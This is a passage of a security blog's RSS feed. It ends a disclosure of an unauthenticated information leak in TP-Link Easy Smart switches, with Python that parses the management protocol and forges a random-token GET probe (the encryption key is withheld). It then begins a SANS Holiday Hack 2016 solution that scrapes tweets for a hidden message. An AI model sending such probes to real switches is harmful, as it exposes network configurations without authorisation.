10 00 00 07 03 01 00 01 06 00 00
10 00 00 07 04 01 00 01 06 00 00
10 00 00 07 05 01 00 01 06 00 00
10 00 00 07 06 01 00 01 00 00 00
10 00 00 07 07 01 00 01 05 00 00
10 00 00 07 08 01 00 01 05 00 00
            ^  ^  ^  ^  ^  ^  ^
Port # ─────┘  │  │  │  │  │  │
Enabled ───────┘  │  │  │  │  │
LAG ──────────────┘  │  │  │  │
Speed (configured) ──┘  │  │  │
Speed (actual) ─────────┘  │  │
Flow control (configured) ─┘  │
Flow control (actual) ────────┘
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
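&lt;p&gt;As an added example (not code from the original post), the following Python parses and builds packets with the header and TLV layout described above, and decodes the per-port TLVs into the columns labelled in the diagram. It works on the decrypted payload: the wire traffic is additionally encrypted with the hard-coded key the Pentest Partners post describes, which is not reproduced here. The sample bytes are the request/reply pair quoted above, with the same anonymised MAC addresses; the field names in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PORT_FIELDS&lt;/code&gt; and the function names are this example’s own.&lt;/p&gt;

```python
# Added example, not code from the original post: parse and build plaintext ESCP
# packets using the 32-byte header and TLV layout described in the text. The wire
# traffic is additionally encrypted with the hard-coded key the post refers to; that
# key is not reproduced here, so these functions work on the decrypted form.
import os
import struct

# version, type, switch MAC, client MAC, seq, error, length, fragment, unused, token, checksum
HEADER_FMT = '!BB6s6sHIHHHHI'             # '!' selects network (big-endian) byte order
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 32 bytes
TERMINATOR = b'\xff\xff\x00\x00'          # closes every payload
TYPE_NAMES = {0: 'DISCOVERY', 1: 'GET', 2: 'GET_RESPONSE', 3: 'SET', 4: 'SET_RESPONSE'}
TLV_PORT_CONFIG = 0x1000                  # switchport configuration, per the post
# Labels for the 7 value bytes of a port TLV; these names are this example's own.
PORT_FIELDS = ('port', 'enabled', 'lag', 'speed_cfg', 'speed_actual', 'flow_cfg', 'flow_actual')

SWITCH_MAC = bytes.fromhex('665544332211')
CLIENT_MAC = bytes.fromhex('aabbccddeeff')

# The request/reply pair quoted in the post, with its anonymised MAC addresses.
CAPTURED_REQUEST = bytes.fromhex(
    '0101665544332211aabbccddeeff03ba'
    '00000000002800000000247800000000'
    '10000000ffff0000')
CAPTURED_REPLY = bytes.fromhex(
    '0102665544332211aabbccddeeff03ba'
    '00000000007c00000000247800000000'
    '10000007010100010600001000000702'
    '01000106000010000007030100010600'
    '00100000070401000106000010000007'
    '05010001060000100000070601000100'
    '00001000000707010001050000100000'
    '0708010001050000ffff0000')


def mac_str(raw):
    return ':'.join('%02x' % b for b in raw)


def parse_tlvs(payload):
    """Walk (type, length, value) tuples until the FF FF 00 00 terminator."""
    tlvs, pos = [], 0
    while payload[pos:pos + 4] != TERMINATOR:
        if len(payload) - pos in range(0, 4):
            raise ValueError('payload ends without terminator')
        tlv_type, length = struct.unpack_from('!HH', payload, pos)
        value = payload[pos + 4:pos + 4 + length]
        if len(value) != length:
            raise ValueError('TLV value truncated')
        tlvs.append((tlv_type, value))
        pos += 4 + length
    return tlvs


def parse_packet(data):
    """Split a decrypted ESCP packet into header fields and its TLV list."""
    if min(len(data), HEADER_LEN) != HEADER_LEN:
        raise ValueError('packet shorter than the 32-byte header')
    (version, ptype, switch_mac, client_mac, seq, error,
     length, fragment, _unused, token, _checksum) = struct.unpack_from(HEADER_FMT, data, 0)
    if length != len(data):
        raise ValueError('length field %d disagrees with %d bytes received' % (length, len(data)))
    return {
        'version': version,
        'type': TYPE_NAMES.get(ptype, 'UNKNOWN_%d' % ptype),
        'switch_mac': mac_str(switch_mac),
        'client_mac': mac_str(client_mac),
        'seq': seq, 'error': error, 'fragment': fragment, 'token': token,
        'tlvs': parse_tlvs(data[HEADER_LEN:]),
    }


def decode_port_tlv(value):
    """Map the 7 value bytes of a port TLV onto the columns of the diagram."""
    if len(value) != len(PORT_FIELDS):
        raise ValueError('unexpected port TLV length %d' % len(value))
    return dict(zip(PORT_FIELDS, value))


def port_table(reply):
    pkt = parse_packet(reply)
    return [decode_port_tlv(v) for t, v in pkt['tlvs'] if t == TLV_PORT_CONFIG]


def build_packet(ptype, switch_mac, client_mac, seq, token, tlvs):
    """Assemble header + TLVs + terminator; error and checksum fields are left zero."""
    body = b''.join(struct.pack('!HH', t, len(v)) + v for t, v in tlvs) + TERMINATOR
    header = struct.pack(HEADER_FMT, 1, ptype, switch_mac, client_mac, seq, 0,
                         HEADER_LEN + len(body), 0, 0, token, 0)
    return header + body


def forge_get(switch_mac, client_mac, seq, tlv_type):
    """A GET for one TLV type with a random token: the unauthenticated probe the post tests."""
    token = int.from_bytes(os.urandom(2), 'big')
    return build_packet(1, switch_mac, client_mac, seq, token, [(tlv_type, b'')])


if __name__ == '__main__':
    for port in port_table(CAPTURED_REPLY):
        print(port)
```

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;build_packet&lt;/code&gt; reproduces the captured request byte-for-byte from its header fields, which is a useful check that the layout above is right. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;forge_get&lt;/code&gt; builds the same GET with a random token, which is the packet used for the test in the section on the vulnerability; to actually send it to UDP port 29808 the encryption layer would still have to be applied first.&lt;/p&gt;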

&lt;p&gt;Writing a Wireshark dissector to decrypt the packets and dissect parts of the protocol, we see this better represented visually below.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/tplink/wireshark_dec.png&quot; alt=&quot;wireshark dissection&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;the-vulnerability&quot;&gt;The vulnerability&lt;/h4&gt;

&lt;p&gt;Notice that the above request did not contain any credentials, unlike SET/login requests, which always contain TLVs carrying the username and password. That leaves us with two possibilities: there are other authentication mechanisms in play, or the switch discloses its configuration to anyone who asks for it.&lt;/p&gt;

&lt;p&gt;Looking back to the structure of the packet header, remember there was a two-byte “token” value. Whenever the configuration utility initiates a SET/login request (which always contains the management credentials), a GET request is made first to refresh this token. Perhaps the switch verifies that the token which accompanies a GET request to “sensitive” information (where sensitive here is defined as any information which the UI would not expose until you’ve logged into the switch) has been authenticated?&lt;/p&gt;

&lt;p&gt;To test this, we send a copy of the request (from another host on the network which has had no management interactions with the switch up until now), &lt;em&gt;with the token set to a random value&lt;/em&gt;. The switch replies just the same as it did with the previous, authentic request.&lt;/p&gt;

&lt;p&gt;So we have ourselves an information disclosure vulnerability - anyone on the network can ask the switch for its various configuration parameters without authentication. This includes the configuration and status of the switchports, names and tags for configured VLANs and their member ports, QoS settings, port mirror settings and much more.&lt;/p&gt;
</description>
        <pubDate>Tue, 06 Jun 2017 00:00:00 +0000</pubDate>
        <link>/post/tplink-easy-smart-switch-vulnerabilities/</link>
        <guid isPermaLink="true">/post/tplink-easy-smart-switch-vulnerabilities/</guid>
        
        
      </item>
    
      <item>
        <title>Solving the SANS Holiday Hack Challenge 2016</title>
        <description>&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Every year, the folks at &lt;a href=&quot;https://www.counterhackchallenges.com/&quot;&gt;Counter Hack Challenges&lt;/a&gt; run a cyber security challenge for people to enjoy over the festive season, and this year it’s a corker.&lt;/p&gt;

&lt;p&gt;Head over to &lt;a href=&quot;https://holidayhackchallenge.com/2016/&quot;&gt;the challenge site&lt;/a&gt; to set the scene, have a look at the questions, and have a go for yourself before reading my solution below!&lt;/p&gt;

&lt;h2 id=&quot;part-1-a-most-curious-business-card&quot;&gt;Part 1: A Most Curious Business Card&lt;/h2&gt;

&lt;p&gt;First, we examine Santa’s business card to see if it contains any clues which might help us get started on our adventure. We see a Twitter handle of &lt;a href=&quot;//twitter.com/santawclaus&quot;&gt;@santawclaus&lt;/a&gt; and a similar Instagram handle of &lt;a href=&quot;//instagram.com/santawclaus&quot;&gt;santawclaus&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/images/business_card.png&quot;&gt;&lt;img src=&quot;/images/business_card.png&quot; alt=&quot;center business card&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A glance at the Twitter stream at first seems like Santa has been spouting gobbledygook, but perhaps there is a hidden message? We use the following python script to pull all the tweets for further analysis.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;HTMLParser&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;HTMLParser&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;twitter&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;access_key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;ACCESS_KEY_HERE&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;access_secret&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;ACCESS_SECRET_HERE&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;consumer_key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;CONSUMER_KEY_HERE&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;consumer_secret&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;CONSUMER_SECRET_HERE&quot;&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;twitter&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Twitter&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;auth&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;OAuth&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;access_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                               &lt;span class=&quot;n&quot;&gt;access_secret&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                               &lt;span class=&quot;n&quot;&gt;consumer_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                               &lt;span class=&quot;n&quot;&gt;consumer_secret&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;user&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;santawclaus&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;statuses&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[]&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;max_id&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;798175529463676928&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;html_parser&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;HTMLParser&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt; &lt;span class=&quot;bp&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;results&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;twitter&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;statuses&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;user_timeline&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;screen_name&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;user&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                                             &lt;span class=&quot;n&quot;&gt;count&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;200&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
                                             &lt;span class=&quot;n&quot;&gt;max_id&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;max_id&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;results&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
       &lt;span class=&quot;k&quot;&gt;break&lt;/span&gt;

    &lt;span class=&quot;n&quot;&gt;statuses&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;html_parser&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unescape&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'text'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;x&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;results&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;

    &lt;span class=&quot;n&quot;&gt;max_id&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;min&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;([&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'id'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;x&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;results&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;


&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;status&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;statuses&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;status&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;and the hidden message of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;BUG BOUNTY&lt;/code&gt; becomes plain as day:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........&amp;lt;GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............&amp;lt;QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP&quot;`.........-&quot;9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ@'...................&quot;$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........&amp;lt;HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....&amp;lt;SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
